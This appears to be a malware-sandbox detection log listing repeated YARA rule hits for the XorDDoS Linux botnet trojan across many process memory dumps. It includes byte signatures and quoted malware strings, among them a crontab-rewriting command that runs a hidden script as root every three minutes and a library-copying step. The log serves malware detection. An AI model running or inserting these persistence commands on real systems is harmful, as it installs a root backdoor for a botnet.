6533.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6403.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6403.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6403.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6403.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6420.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6420.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6420.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6420.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6319.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6319.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6319.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6319.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6562.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6562.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6562.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6562.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6479.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6479.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6479.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6479.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6394.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6394.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6394.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6394.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6593.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6593.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6593.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6593.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6428.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6428.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6428.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6428.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6488.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6488.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6488.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6488.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6536.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6536.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6536.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6536.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6493.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6493.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6493.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6493.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6460.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6460.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6460.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6460.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6311.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6311.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6311.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6311.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6335.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6335.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6335.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6335.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6316.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6316.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6316.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6316.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6435.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6435.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6435.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6435.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6567.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6567.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6567.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6567.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6584.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6584.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6584.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6584.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6386.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6386.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6386.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6386.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6545.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6545.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6545.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6545.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6559.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6559.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6559.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6559.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6564.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6564.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6564.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6564.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6264.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6264.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
